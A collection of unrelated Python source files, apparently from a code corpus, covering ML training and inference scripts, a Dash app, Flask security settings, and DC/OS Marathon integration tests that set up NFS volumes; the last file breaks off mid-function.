response = requests.post(service_discovery_uri,
verify=False,
auth=(service_discovery_user, service_discovery_password),
**kwargs)
response.raise_for_status()
return response
except requests.exceptions.RequestException as ex:
print "Failed to make POST request to service discovery url. " + str(ex)
sys.stdout.flush()
sys.stderr.flush()
time.sleep(1)
print "FAILED. Could not make POST request to service discovery url."
exit(1)
def __splunk_execute(args):
"""
Execute splunk with arguments
"""
sys.stdout.flush()
sys.stderr.flush()
splunk_args = [os.path.join(os.environ['SPLUNK_HOME'], "bin", "splunk")]
splunk_args.extend(args)
subprocess.check_call(splunk_args)
sys.stdout.flush()
sys.stderr.flush()
if __name__ == "__main__":
main()
|
39739
|
import numpy as np
from ..base import BaseSKI
from tods.detection_algorithm.PyodSOD import SODPrimitive
class SODSKI(BaseSKI):
def __init__(self, **hyperparams):
super().__init__(primitive=SODPrimitive, **hyperparams)
self.fit_available = True
self.predict_available = True
self.produce_available = False
|
39747
|
import torch
import pickle
import argparse
import os
from tqdm import trange, tqdm
import torch
import torchtext
from torchtext import data
from torchtext import datasets
from torch import nn
import torch.nn.functional as F
import math
from models import SimpleLSTMModel, AttentionRNN
from train_args import get_arg_parser
import constants
from vocab import Vocabulary, load_vocab
import dataset as d
def build_model(
parser: argparse.ArgumentParser,
en_vocab: Vocabulary,
fr_vocab: Vocabulary,
) -> nn.Module:
# TODO make switch case
args = parser.parse_args()
if args.model_type == 'SimpleLSTM':
SimpleLSTMModel.add_args(parser)
args = parser.parse_args()
return SimpleLSTMModel.build_model(
src_vocab=en_vocab,
trg_vocab=fr_vocab,
encoder_embed_dim=args.encoder_embed_dim,
encoder_hidden_dim=args.encoder_hidden_dim,
encoder_dropout=args.encoder_dropout,
encoder_num_layers=args.encoder_layers,
decoder_embed_dim=args.decoder_embed_dim,
decoder_hidden_dim=args.decoder_hidden_dim,
decoder_dropout=args.decoder_dropout,
decoder_num_layers=args.decoder_layers,
)
elif args.model_type == 'AttentionRNN':
AttentionRNN.add_args(parser)
args = parser.parse_args()
return AttentionRNN.build_model(
src_vocab=en_vocab,
trg_vocab=fr_vocab,
encoder_embed_dim=args.encoder_embed_dim,
encoder_hidden_dim=args.encoder_hidden_dim,
encoder_dropout=args.encoder_dropout,
encoder_num_layers=args.encoder_layers,
decoder_embed_dim=args.decoder_embed_dim,
decoder_hidden_dim=args.decoder_hidden_dim,
decoder_dropout=args.decoder_dropout,
decoder_num_layers=args.decoder_layers,
teacher_student_ratio=args.teacher_student_ratio,
)
else:
raise Exception(
"Unknown Model Type: {}".format(args.model_type)
)
def train(
train_loader: d.BatchedIterator,
valid_loader: d.BatchedIterator,
model: nn.Module,
epochs: int,
learning_rate: float,
weight_decay: float,
log_dir: str,
save_dir: str,
en_vocab: Vocabulary,
fr_vocab: Vocabulary,
device: str,
multi_gpu: bool,
save_step: int,
model_name: str,
optimizer: str,
) -> None:
model = model.to(device)
if multi_gpu and device == 'cuda':
print('Using multi gpu training')
model = torch.nn.DataParallel(model, device_ids=[0, 1]).cuda()
if optimizer == "sgd":
print("using stochastic gradient descent optimizer")
optim = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
elif optimizer == "adam":
print("using adam optimizer")
optim = torch.optim.Adam(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
else:
raise Exception("Illegal Optimizer {}".format(optimizer))
# [DEBUG]: count number of nans
nan_count = 0
for e in range(epochs):
total_loss = 0.0
count = 0
with tqdm(train_loader, total=len(train_loader)) as pbar:
for i, data in enumerate(pbar):
src, trg, src_lengths, trg_lengths, prev_tokens, prev_lengths = data
src = src.to(device)
trg = trg.to(device)
src_lengths = src_lengths.to(device)
trg_lengths = trg_lengths.to(device)
prev_tokens = prev_tokens.to(device)
prev_lengths = prev_lengths.to(device)
# feed everything into model
# compute loss
# call backwards
# trg_tensor = torch.cat([trg, eos_tensor], dim=1).to(device)
# prev_tokens = torch.cat([eos_tensor, trg], dim=1).to(device)
optim.zero_grad()
predicted, _ = model.forward(src, src_lengths, prev_tokens)
if not multi_gpu:
loss = model.loss(predicted.view(-1, predicted.size(-1)), trg.view(-1))
else:
# if using data parallel, loss has to be computed here
# there is no longer a model loss function that we have
# access to.
# TODO: data parallel kills the computer, why?
loss = F.cross_entropy(
predicted.view(-1, predicted.size(-1)),
trg_tensor.view(-1),
ignore_index=fr_vocab.word2idx(constants.PAD_TOKEN),
)
if math.isnan(loss.item()):
'''
Ignore nan loss for backward, and continue forward
'''
nan_count += 1
print('found nan at {}'.format(i))
torch.save(
model.state_dict(),
os.path.join(save_dir, model_name, 'unk_problem.pt')
)
return
loss.backward()
optim.step()
total_loss += loss.item()
count += 1
pbar.set_postfix(
loss_avg=total_loss/(count),
epoch="{}/{}".format(e + 1, epochs),
curr_loss=loss.item(),
nan_count=nan_count,
)
pbar.refresh()
if (i + 1) % save_step == 0:
print('Saving model at iteration {} for epoch {}'.format(i, e))
model_file_name = "model_epoch_{}_itr_{}".format(e, i)
torch.save(
model.state_dict(),
os.path.join(save_dir, model_name, model_file_name)
)
print("Summary: Total Loss {} | Count {} | Average {}".format(total_loss, count, total_loss / count))
model_file_name = "model_epoch_{}_final".format(e)
print('saving to {}'.format(os.path.join(save_dir, model_name, model_file_name)))
torch.save(
model.state_dict(),
os.path.join(save_dir, model_name, model_file_name)
)
train_loader.reset()
# valid_loader.reset()
def main() -> None:
parser = get_arg_parser()
args = parser.parse_args()
device = "cuda" if torch.cuda.is_available() and args.cuda else "cpu"
print('using device {}'.format(device))
print('loading vocabulary...')
if args.small:
print('using small training set')
en_vocab = load_vocab(constants.SMALL_TRAIN_EN_VOCAB_FILE)
fr_vocab = load_vocab(constants.SMALL_TRAIN_FR_VOCAB_FILE)
else:
en_vocab = load_vocab(constants.TRAIN_EN_VOCAB_FILE)
fr_vocab = load_vocab(constants.TRAIN_FR_VOCAB_FILE)
print('loaded vocabulary')
print('loading datasets...')
if args.small:
train_dataset = d.ShardedCSVDataset(constants.WMT14_EN_FR_SMALL_TRAIN_SHARD)
else:
train_dataset = d.ShardedCSVDataset(constants.WMT14_EN_FR_TRAIN_SHARD)
# valid_dataset = d.DualFileDataset(
# constants.WMT14_EN_FR_VALID + ".en",
# constants.WMT14_EN_FR_VALID + ".fr",
# )
train_loader = d.BatchedIterator(
args.batch_size,
train_dataset,
en_vocab,
fr_vocab,
args.max_sequence_length,
)
# valid_loader = d.BatchedIterator(
# 1,
# valid_dataset,
# en_vocab,
# fr_vocab,
# args.max_sequence_length,
# )
model = build_model(parser, en_vocab, fr_vocab)
print('using model...')
print(model)
if not os.path.exists(args.log_dir):
os.makedirs(args.log_dir)
if not os.path.exists(os.path.join(args.save_dir, args.model_name)):
os.makedirs(os.path.join(args.save_dir, args.model_name))
# model.load_state_dict(torch.load('delete/model_1543183590.2138884/unk_problem.pt'))
train(
train_loader=train_loader,
valid_loader=None, # valid_loader,
model=model,
epochs=args.num_epochs,
learning_rate=args.learning_rate,
weight_decay=args.weight_decay,
log_dir=args.log_dir,
save_dir=args.save_dir,
en_vocab=en_vocab,
fr_vocab=fr_vocab,
device=device,
multi_gpu=args.multi_gpu,
save_step=args.save_step,
model_name=args.model_name,
optimizer=args.optimizer,
)
if __name__ == "__main__":
main()
|
39755
|
from functools import reduce
import numpy as np
import json
import tensorflow as tf
from scipy.optimize import linear_sum_assignment
import os
import time
def deleteDuplicate_v1(input_dict_lst):
f = lambda x,y:x if y in x else x + [y]
return reduce(f, [[], ] + input_dict_lst)
def get_context_pair(resp, l):
label_weights = l['label_weights']
valid_resp = {}
for key in resp:
valid_resp[key] = []
for index, value in enumerate(resp[key]):
if label_weights[index] == 1:
valid_resp[key].append(value)
answer = l['answer_tokens']
position_tokens = l['tokens']
label_position = [lpos-1 for index, lpos in enumerate(l['label_positions']) if label_weights[index]==1]
score_label = []
for index in range(len(valid_resp['pred_label'])):
label = valid_resp['pred_label'][index]
score = valid_resp['max_prob'][index]
position = label_position[index]
position_token = position_tokens[str(position)][1]
if label == 1:
score = 1 - score
score_label.append({"score":score, "label":label,
"position_token":position_token,
"answer":answer})
return score_label
def format_socre_matrix(result_lst, score_merge='mean'):
answer_dict = {}
candidate_dict = {}
answer_index = 0
pos_index = 0
for item in result_lst:
if item['answer'] not in answer_dict:
answer_dict[item['answer']] = answer_index
answer_index += 1
if item['position_token'] not in candidate_dict:
candidate_dict[item['position_token']] = pos_index
pos_index += 1
score_matrix = -np.ones((len(answer_dict), len(candidate_dict)))
for item in result_lst:
answer_pos = answer_dict[item['answer']]
candidate_pos = candidate_dict[item['position_token']]
score_matrix_score = score_matrix[answer_pos, candidate_pos]
if score_matrix_score == -1:
score_matrix[answer_pos, candidate_pos] = item['score']
else:
if score_merge == 'mean':
score_matrix[answer_pos, candidate_pos] += item['score']
score_matrix[answer_pos, candidate_pos] /= 2
elif score_merge == 'max':
if item['score'] > score_matrix[answer_pos, candidate_pos]:
score_matrix[answer_pos, candidate_pos] = item['score']
return score_matrix, answer_dict, candidate_dict
import tensorflow as tf
flags = tf.flags
FLAGS = flags.FLAGS
# os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
tf.logging.set_verbosity(tf.logging.INFO)
flags.DEFINE_string("buckets", "", "oss buckets")
flags.DEFINE_string(
"input_file", None,
"Input TF example files (can be a glob or comma separated).")
flags.DEFINE_string(
"output_file", None,
"Input TF example files (can be a glob or comma separated).")
flags.DEFINE_string(
"model_file", None,
"Input TF example files (can be a glob or comma separated).")
flags.DEFINE_string(
"score_merge", "max",
"Input TF example files (can be a glob or comma separated).")
input_file = os.path.join(FLAGS.buckets, FLAGS.input_file)
output_file = os.path.join(FLAGS.buckets, FLAGS.output_file)
model_file = os.path.join(FLAGS.buckets, FLAGS.model_file)
from tensorflow.contrib import predictor
# model_dict = {
# "model":'/data/xuht/albert.xht/nlpcc2019/open_data/model/1566283032'
# }
model_dict = {
"model":model_file
}
chid_model = predictor.from_saved_model(model_dict['model'])
fwobj = tf.gfile.Open(output_file, "w")
cnt = 0
valid_keys = ['input_ids', 'label_weights',
'label_positions', 'label_ids',
'segment_ids']
with tf.gfile.Open(input_file, "r") as f:
for index, line in enumerate(f):
content = json.loads(line.strip())
total_resp = []
start = time.time()
for t in content:
tmp = {}
for l in t:
for key in valid_keys:
if key in tmp:
tmp[key].append(l[key])
else:
tmp[key] = [l[key]]
# tmp = {
# "input_ids":np.array([l['input_ids']]),
# 'label_weights':np.array([l['label_weights']]),
# 'label_positions':np.array([l['label_positions']]),
# 'label_ids':np.array([l['label_ids']]),
# 'segment_ids':np.array([l['segment_ids']]),
# }
resp = chid_model(tmp)
resp_lst = []
batch_size = int(resp['pred_label'].shape[0]/5)
for key in resp:
resp[key] = np.reshape(resp[key], [-1, 5]).tolist()
for i_index in range(batch_size):
tmp = {
"pred_label":resp['pred_label'][i_index],
"max_prob":resp['max_prob'][i_index],
}
resp_lst.append(tmp)
for i_index in range(len(t)):
resp_ = resp_lst[i_index]
l_ = t[i_index]
result = get_context_pair(resp_, l_)
total_resp.extend(result)
total_resp = deleteDuplicate_v1(total_resp)
resp = format_socre_matrix(total_resp, score_merge=FLAGS.score_merge)
row_ind, col_ind = linear_sum_assignment(resp[0])
mapping_dict = dict(zip(col_ind, row_ind))
dura = time.time()-start
candidte_dict = resp[-1]
candidate_inverse_dict = {}
for key in candidte_dict:
candidate_inverse_dict[candidte_dict[key]] = key
candidate_name_dict = {}
for col in mapping_dict:
col_name = candidate_inverse_dict[col]
candidate_name_dict[col_name] = int(mapping_dict[col])
cnt += len(candidate_name_dict)
if np.mod(index, 100) == 0:
print(candidate_name_dict, index, dura)
fwobj.write(json.dumps(candidate_name_dict, ensure_ascii=False)+"\n")
fwobj.close()
print('==total cnt==', cnt)
|
39777
|
from collections import OrderedDict
import pandas as pd
from tests import project_test, assert_output
@project_test
def test_csv_to_close(fn):
tickers = ['A', 'B', 'C']
dates = ['2017-09-22', '2017-09-25', '2017-09-26', '2017-09-27', '2017-09-28']
fn_inputs = {
'csv_filepath': 'prices_2017_09_22_2017-09-28.csv',
'field_names': ['ticker', 'date', 'open', 'high', 'low', 'close', 'volume', 'adj_close', 'adj_volume']}
fn_correct_outputs = OrderedDict([
(
'close',
pd.DataFrame(
[
[152.48000000, 149.19000000, 59.35000000],
[151.11000000, 145.06000000, 60.29000000],
[152.42000000, 145.21000000, 57.74000000],
[154.34000000, 147.02000000, 58.41000000],
[153.68000000, 147.19000000, 56.76000000]],
dates, tickers))])
assert_output(fn, fn_inputs, fn_correct_outputs)
|
39829
|
import dash
import dash_bio as dashbio
import dash_html_components as html
import dash_core_components as dcc
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
app.layout = html.Div([
'Select which chromosomes to display on the ideogram below:',
dcc.Dropdown(
id='displayed-chromosomes',
options=[{'label': str(i), 'value': str(i)} for i in range(1, 23)],
multi=True,
value=[str(i) for i in range(1, 23)]
),
dashbio.Ideogram(
id='my-dashbio-ideogram'
),
html.Div(id='ideogram-rotated')
])
@app.callback(
dash.dependencies.Output('my-dashbio-ideogram', 'chromosomes'),
[dash.dependencies.Input('displayed-chromosomes', 'value')]
)
def update_ideogram(value):
return value
@app.callback(
dash.dependencies.Output('ideogram-rotated', 'children'),
[dash.dependencies.Input('my-dashbio-ideogram', 'rotated')]
)
def update_ideogram_rotated(rot):
return 'You have {} selected a chromosome.'.format(
'' if rot else 'not')
if __name__ == '__main__':
app.run_server(debug=True)
|
39868
|
def assign_variable(robot_instance, variable_name, args):
"""Assign a robotframework variable."""
variable_value = robot_instance.run_keyword(*args)
robot_instance._variables.__setitem__(variable_name, variable_value)
return variable_value
|
39893
|
import tfcoreml as tf_converter
tf_converter.convert(tf_model_path = 'retrained_graph.pb',
mlmodel_path = 'converted.mlmodel',
output_feature_names = ['final_result:0'],
image_input_names = 'input:0',
class_labels = 'retrained_labels.txt',
red_bias = -1,
green_bias = -1,
blue_bias = -1,
image_scale = 2.0/224.0
)
|
39980
|
from datetime import datetime, timezone
from flask import abort
from flask_unchained import BundleConfig
from http import HTTPStatus
from .forms import (
LoginForm,
RegisterForm,
ForgotPasswordForm,
ResetPasswordForm,
ChangePasswordForm,
SendConfirmationForm,
)
from .models import AnonymousUser
class AuthenticationConfig:
"""
Config options for logging in and out.
"""
SECURITY_LOGIN_FORM = LoginForm
"""
The form class to use for the login view.
"""
SECURITY_DEFAULT_REMEMBER_ME = False
"""
Whether or not the login form should default to checking the
"Remember me?" option.
"""
SECURITY_REMEMBER_SALT = 'security-remember-salt'
"""
Salt used for the remember me cookie token.
"""
SECURITY_USER_IDENTITY_ATTRIBUTES = ['email'] # FIXME-identity
"""
List of attributes on the user model that can used for logging in with.
Each must be unique.
"""
SECURITY_POST_LOGIN_REDIRECT_ENDPOINT = '/'
"""
The endpoint or url to redirect to after a successful login.
"""
SECURITY_POST_LOGOUT_REDIRECT_ENDPOINT = '/'
"""
The endpoint or url to redirect to after a user logs out.
"""
class ChangePasswordConfig:
"""
Config options for changing passwords
"""
SECURITY_CHANGEABLE = False
"""
Whether or not to enable change password functionality.
"""
SECURITY_CHANGE_PASSWORD_FORM = ChangePasswordForm
"""
Form class to use for the change password view.
"""
SECURITY_POST_CHANGE_REDIRECT_ENDPOINT = None
"""
Endpoint or url to redirect to after the user changes their password.
"""
SECURITY_SEND_PASSWORD_CHANGED_EMAIL = \
'mail_bundle' in BundleConfig.current_app.unchained.bundles
"""
Whether or not to send the user an email when their password has been changed.
Defaults to True, and it's strongly recommended to leave this option enabled.
"""
class EncryptionConfig:
"""
Config options for encryption hashing.
"""
SECURITY_PASSWORD_SALT = 'security-password-salt'
"""
Specifies the HMAC salt. This is only used if the password hash type is
set to something other than plain text.
"""
SECURITY_PASSWORD_HASH = 'bcrypt'
"""
Specifies the password hash algorithm to use when hashing passwords.
Recommended values for production systems are ``argon2``, ``bcrypt``,
or ``pbkdf2_sha512``. May require extra packages to be installed.
"""
SECURITY_PASSWORD_SINGLE_HASH = False
"""
Specifies that passwords should only be hashed once. By default, passwords
are hashed twice, first with SECURITY_PASSWORD_SALT, and then with a random
salt. May be useful for integrating with other applications.
"""
SECURITY_PASSWORD_SCHEMES = ['argon2',
'bcrypt',
'pbkdf2_sha512',
# and always the last one...
'plaintext']
"""
List of algorithms that can be used for hashing passwords.
"""
SECURITY_PASSWORD_HASH_OPTIONS = {}
"""
Specifies additional options to be passed to the hashing method.
"""
SECURITY_DEPRECATED_PASSWORD_SCHEMES = ['auto']
"""
List of deprecated algorithms for hashing passwords.
"""
SECURITY_HASHING_SCHEMES = ['sha512_crypt']
"""
List of algorithms that can be used for creating and validating tokens.
"""
SECURITY_DEPRECATED_HASHING_SCHEMES = []
"""
List of deprecated algorithms for creating and validating tokens.
"""
class ForgotPasswordConfig:
"""
Config options for recovering forgotten passwords
"""
SECURITY_RECOVERABLE = False
"""
Whether or not to enable forgot password functionality.
"""
SECURITY_FORGOT_PASSWORD_FORM = ForgotPasswordForm
"""
Form class to use for the forgot password form.
"""
# reset password (when the user clicks the link from the email sent by forgot pw)
# --------------
SECURITY_RESET_PASSWORD_FORM = ResetPasswordForm
"""
Form class to use for the reset password form.
"""
SECURITY_RESET_SALT = 'security-reset-salt'
"""
Salt used for the reset token.
"""
SECURITY_RESET_PASSWORD_WITHIN = '5 days'
"""
Specifies the amount of time a user has before their password reset link
expires. Always pluralized the time unit for this value. Defaults to 5 days.
"""
SECURITY_POST_RESET_REDIRECT_ENDPOINT = None
"""
Endpoint or url to redirect to after the user resets their password.
"""
SECURITY_INVALID_RESET_TOKEN_REDIRECT = 'security_controller.forgot_password'
"""
Endpoint or url to redirect to if the reset token is invalid.
"""
SECURITY_EXPIRED_RESET_TOKEN_REDIRECT = 'security_controller.forgot_password'
"""
Endpoint or url to redirect to if the reset token is expired.
"""
SECURITY_API_RESET_PASSWORD_HTTP_GET_REDIRECT = None
"""
Endpoint or url to redirect to if a GET request is made to the reset password
view. Defaults to None, meaning no redirect. Useful for single page apps.
"""
SECURITY_SEND_PASSWORD_RESET_NOTICE_EMAIL = \
'mail_bundle' in BundleConfig.current_app.unchained.bundles
"""
Whether or not to send the user an email when their password has been reset.
Defaults to True, and it's strongly recommended to leave this option enabled.
"""
class RegistrationConfig:
"""
Config options for user registration
"""
SECURITY_REGISTERABLE = False
"""
Whether or not to enable registration.
"""
SECURITY_REGISTER_FORM = RegisterForm
"""
The form class to use for the register view.
"""
SECURITY_POST_REGISTER_REDIRECT_ENDPOINT = None
"""
The endpoint or url to redirect to after a user completes the
registration form.
"""
SECURITY_SEND_REGISTER_EMAIL = \
'mail_bundle' in BundleConfig.current_app.unchained.bundles
"""
Whether or not send a welcome email after a user completes the
registration form.
"""
# email confirmation options
# --------------------------
SECURITY_CONFIRMABLE = False
"""
Whether or not to enable required email confirmation for new users.
"""
SECURITY_SEND_CONFIRMATION_FORM = SendConfirmationForm
"""
Form class to use for the (re)send confirmation email form.
"""
SECURITY_CONFIRM_SALT = 'security-confirm-salt'
"""
Salt used for the confirmation token.
"""
SECURITY_LOGIN_WITHOUT_CONFIRMATION = False
"""
Allow users to login without confirming their email first. (This option
only applies when :attr:`SECURITY_CONFIRMABLE` is True.)
"""
SECURITY_CONFIRM_EMAIL_WITHIN = '5 days'
"""
How long to wait until considering the token in confirmation emails to
be expired.
"""
SECURITY_POST_CONFIRM_REDIRECT_ENDPOINT = None
"""
Endpoint or url to redirect to after the user confirms their email.
Defaults to :attr:`SECURITY_POST_LOGIN_REDIRECT_ENDPOINT`.
"""
SECURITY_CONFIRM_ERROR_REDIRECT_ENDPOINT = None
"""
Endpoint to redirect to if there's an error confirming the user's email.
"""
class TokenConfig:
"""
Config options for token authentication.
"""
SECURITY_TOKEN_AUTHENTICATION_KEY = 'auth_token'
"""
Specifies the query string parameter to read when using token authentication.
"""
SECURITY_TOKEN_AUTHENTICATION_HEADER = 'Authentication-Token'
"""
Specifies the HTTP header to read when using token authentication.
"""
SECURITY_TOKEN_MAX_AGE = None
"""
Specifies the number of seconds before an authentication token expires.
Defaults to None, meaning the token never expires.
"""
class Config(AuthenticationConfig,
ChangePasswordConfig,
EncryptionConfig,
ForgotPasswordConfig,
RegistrationConfig,
TokenConfig,
BundleConfig):
"""
Config options for the Security Bundle.
"""
SECURITY_ANONYMOUS_USER = AnonymousUser
"""
Class to use for representing anonymous users.
"""
SECURITY_UNAUTHORIZED_CALLBACK = lambda: abort(HTTPStatus.UNAUTHORIZED)
"""
This callback gets called when authorization fails. By default we abort with
an HTTP status code of 401 (UNAUTHORIZED).
"""
# make datetimes timezone-aware by default
SECURITY_DATETIME_FACTORY = lambda: datetime.now(timezone.utc)
"""
Factory function to use when creating new dates. By default we use
``datetime.now(timezone.utc)`` to create a timezone-aware datetime.
"""
ADMIN_CATEGORY_ICON_CLASSES = {
'Security': 'fa fa-lock',
}
class TestConfig(Config):
"""
Default test settings for the Security Bundle.
"""
SECURITY_PASSWORD_HASH = '<PASSWORD>'
"""
Disable password-hashing in tests (shaves about 30% off the test-run time)
"""
|
39984
|
import numpy as np
import pydensecrf.densecrf as dcrf
from pydensecrf.utils import compute_unary, create_pairwise_bilateral, create_pairwise_gaussian, unary_from_softmax
def dense_crf(img, prob):
'''
input:
img: numpy array of shape (num of channels, height, width)
prob: numpy array of shape (9, height, width), neural network last layer sigmoid output for img
output:
res: (height, width)
Modified from:
http://warmspringwinds.github.io/tensorflow/tf-slim/2016/12/18/image-segmentation-with-tensorflow-using-cnns-and-conditional-random-fields/
https://github.com/yt605155624/tensorflow-deeplab-resnet/blob/e81482d7bb1ae674f07eae32b0953fe09ff1c9d1/inference_crf.py
'''
img = np.swapaxes(img, 0, 2)
# img.shape: (width, height, num of channels)(224,224,3)
num_iter = 50
prob = np.swapaxes(prob, 1, 2) # shape: (1, width, height) (9,224,224)
num_classes = 9 #2
d = dcrf.DenseCRF2D(img.shape[0] , img.shape[1], num_classes)
unary = unary_from_softmax(prob) # shape: (num_classes, width * height)
unary = np.ascontiguousarray(unary)
img = np.ascontiguousarray(img,dtype=np.uint8)
d.setUnaryEnergy(unary)
d.addPairwiseBilateral(sxy=5, srgb=3, rgbim=img, compat=3)
Q = d.inference(num_iter) # set the number of iterations
res = np.argmax(Q, axis=0).reshape((img.shape[0], img.shape[1]))
# res.shape: (width, height)
res = np.swapaxes(res, 0, 1) # res.shape: (height, width)
# res = res[np.newaxis, :, :] # res.shape: (1, height, width)
# func_end = time.time()
# print('{:.2f} sec spent on CRF with {} iterations'.format(func_end - func_start, num_iter))
# about 2 sec for a 1280 * 960 image with 5 iterations
return res
|
40040
|
import logging
import uuid
from typing import Any
import pytest
import requests
import test_helpers
from dcos_test_utils import marathon
from dcos_test_utils.dcos_api import DcosApiSession
__maintainer__ = 'kensipe'
__contact__ = '<EMAIL>'
log = logging.getLogger(__name__)
def deploy_test_app_and_check(dcos_api_session: DcosApiSession, app: dict, test_uuid: str) -> None:
"""This method deploys the test server app and then
pings its /operating_environment endpoint to retrieve the container
user running the task.
In a mesos container, this will be the marathon user
In a docker container this user comes from the USER setting
from the app's Dockerfile, which, for the test application
is the default, root
"""
expanded_config = test_helpers.get_expanded_config()
default_os_user = 'nobody' if expanded_config.get('security') == 'strict' else 'root'
if 'container' in app and app['container']['type'] == 'DOCKER':
marathon_user = 'root'
else:
marathon_user = app.get('user', default_os_user)
with dcos_api_session.marathon.deploy_and_cleanup(app):
service_points = dcos_api_session.marathon.get_app_service_endpoints(app['id'])
r = requests.get('http://{}:{}/test_uuid'.format(service_points[0].host, service_points[0].port))
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{0} {1}. "
msg += "Detailed explanation of the problem: {2}"
raise Exception(msg.format(r.status_code, r.reason, r.text))
r_data = r.json()
assert r_data['test_uuid'] == test_uuid
r = requests.get('http://{}:{}/operating_environment'.format(
service_points[0].host,
service_points[0].port))
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{0} {1}. "
msg += "Detailed explanation of the problem: {2}"
raise Exception(msg.format(r.status_code, r.reason, r.text))
json_uid = r.json()['uid']
if marathon_user == 'root':
assert json_uid == 0, "App running as root should have uid 0."
else:
assert json_uid != 0, ("App running as {} should not have uid 0.".format(marathon_user))
@pytest.mark.first
def test_docker_image_availablity() -> None:
assert test_helpers.docker_pull_image("debian:stretch-slim"), "docker pull failed for image used in the test"
def test_if_marathon_app_can_be_deployed(dcos_api_session: DcosApiSession) -> None:
"""Marathon app deployment integration test
This test verifies that marathon app can be deployed, and that service points
returned by Marathon indeed point to the app that was deployed.
The application being deployed is a simple http server written in python.
Please test_server.py for more details.
This is done by assigning an unique UUID to each app and passing it to the
docker container as an env variable. After successful deployment, the
"GET /test_uuid" request is issued to the app. If the returned UUID matches
the one assigned to test - test succeeds.
"""
deploy_test_app_and_check(dcos_api_session, *test_helpers.marathon_test_app())
def test_if_docker_app_can_be_deployed(dcos_api_session: DcosApiSession) -> None:
"""Marathon app inside docker deployment integration test.
Verifies that a marathon app inside of a docker daemon container can be
deployed and accessed as expected.
"""
deploy_test_app_and_check(
dcos_api_session,
*test_helpers.marathon_test_app(
network=marathon.Network.BRIDGE,
container_type=marathon.Container.DOCKER,
container_port=9080))
@pytest.mark.parametrize('healthcheck', [
marathon.Healthcheck.HTTP,
marathon.Healthcheck.MESOS_HTTP,
])
def test_if_ucr_app_can_be_deployed(dcos_api_session: DcosApiSession, healthcheck: Any) -> None:
"""Marathon app inside ucr deployment integration test.
Verifies that a marathon docker app inside of a ucr container can be
deployed and accessed as expected.
"""
deploy_test_app_and_check(
dcos_api_session,
*test_helpers.marathon_test_app(
container_type=marathon.Container.MESOS,
healthcheck_protocol=healthcheck))
def test_if_marathon_app_can_be_deployed_with_mesos_containerizer(dcos_api_session: DcosApiSession) -> None:
"""Marathon app deployment integration test using the Mesos Containerizer
This test verifies that a Marathon app using the Mesos containerizer with
a Docker image can be deployed.
This is done by assigning an unique UUID to each app and passing it to the
docker container as an env variable. After successfull deployment, the
"GET /test_uuid" request is issued to the app. If the returned UUID matches
the one assigned to test - test succeds.
When port mapping is available (MESOS-4777), this test should be updated to
reflect that.
"""
deploy_test_app_and_check(
dcos_api_session,
*test_helpers.marathon_test_app(container_type=marathon.Container.MESOS))
def test_if_marathon_app_can_be_deployed_with_nfs_csi_volume(dcos_api_session: DcosApiSession) -> None:
"""Marathon app deployment integration test using an NFS CSI volume.
This test verifies that a Marathon app can be deployed which attaches to
an NFS volume provided by the NFS CSI plugin. In order to accomplish this,
we must first set up an NFS share on one agent.
"""
# We will run an NFS server on one agent and an app on another agent to
# verify CSI volume functionality.
if len(dcos_api_session.slaves) < 2:
pytest.skip("CSI Volume Tests require a minimum of two agents.")
expanded_config = test_helpers.get_expanded_config()
if expanded_config.get('security') == 'strict':
pytest.skip('Cannot setup NFS server as root user with EE strict mode enabled')
test_uuid = uuid.uuid4().hex
hosts = dcos_api_session.slaves[0], dcos_api_session.slaves[1]
# A helper to run a Metronome job as root to clean up the NFS share on an agent.
# We define this here so that it can be used during error handling.
def cleanup_nfs() -> None:
cleanup_command = """
sudo systemctl stop nfs-server && \
echo '' | sudo tee /etc/exports && \
sudo systemctl restart nfs-utils && \
sudo exportfs -arv && \
sudo rm -rf /var/lib/dcos-nfs-shares/test-volume-001
"""
cleanup_job = {
'description': 'Clean up NFS share',
'id': 'nfs-share-cleanup-{}'.format(test_uuid),
'run': {
'cmd': cleanup_command,
'cpus': 0.5,
'mem': 256,
'disk': 32,
'user': 'root',
'restart': {'policy': 'ON_FAILURE'},
'placement': {
'constraints': [{
'attribute': '@hostname',
'operator': 'LIKE',
'value': hosts[0]
}]
}
}
}
dcos_api_session.metronome_one_off(cleanup_job)
# Run a Metronome job as root to set up the NFS share on an agent.
command = """sudo mkdir -p /var/lib/dcos-nfs-shares/test-volume-001 && \
sudo chown -R nobody: /var/lib/dcos-nfs-shares/test-volume-001 && \
sudo chmod 777 /var/lib/dcos-nfs-shares/test-volume-001 && \
echo '/var/lib/dcos-nfs-shares/test-volume-001 *(rw,sync)' | sudo tee /etc/exports && \
sudo systemctl restart nfs-utils && \
sudo exportfs -arv && \
sudo systemctl start nfs-server && \
sudo systemctl enable nfs-server
"""
setup_job = {
'description': 'Set up NFS share',
'id': 'nfs-share-setup-{}'.format(test_uuid),
'run': {
'cmd': command,
'cpus': 0.5,
'mem': 256,
'disk': 32,
'user': 'root',
'restart': {'policy': 'ON_FAILURE'},
'placement': {
'constraints': [{
'attribute': '@hostname',
'operator': 'LIKE',
'value': hosts[0]
}]
}
}
}
dcos_api_session.metronome_one_off(setup_job)
# Create an app which writes to the NFS volume.
app = {
'id': 'csi-nfs-write-app-{}'.format(test_uuid),
'instances': 1,
'cpus': 0.5,
'mem': 256,
'cmd': 'echo some-stuff > test-volume-dir/output && sleep 999999',
'user': 'root',
'container': {
'type': 'MESOS',
'volumes': [{
'mode': 'rw',
'containerPath': 'test-volume-dir',
'external': {
'provider': 'csi',
'name': 'test-volume-001',
'options': {
'pluginName': 'nfs.csi.k8s.io',
'capability': {
'accessType': 'mount',
'accessMode': 'MULTI_NODE_MULTI_WRITER',
'fsType': 'nfs'
},
'volumeContext': {
'server': hosts[0],
'share': '/var/lib/dcos-nfs-shares/test-volume-001'
}
}
}
}]
},
'constraints': [
[
'hostname',
'LIKE',
hosts[1]
]
],
'healthChecks': [{
'protocol': 'COMMAND',
'command': {'value': 'test `cat test-volume-dir/output` = some-stuff'},
'gracePeriodSeconds': 5,
'intervalSeconds': 10,
'timeoutSeconds': 10,
'maxConsecutiveFailures': 3
}]
}
try:
with dcos_api_session.marathon.deploy_and_cleanup(app):
# Trivial app if it deploys, there is nothing else to check
pass
except Exception as error:
raise(error)
finally:
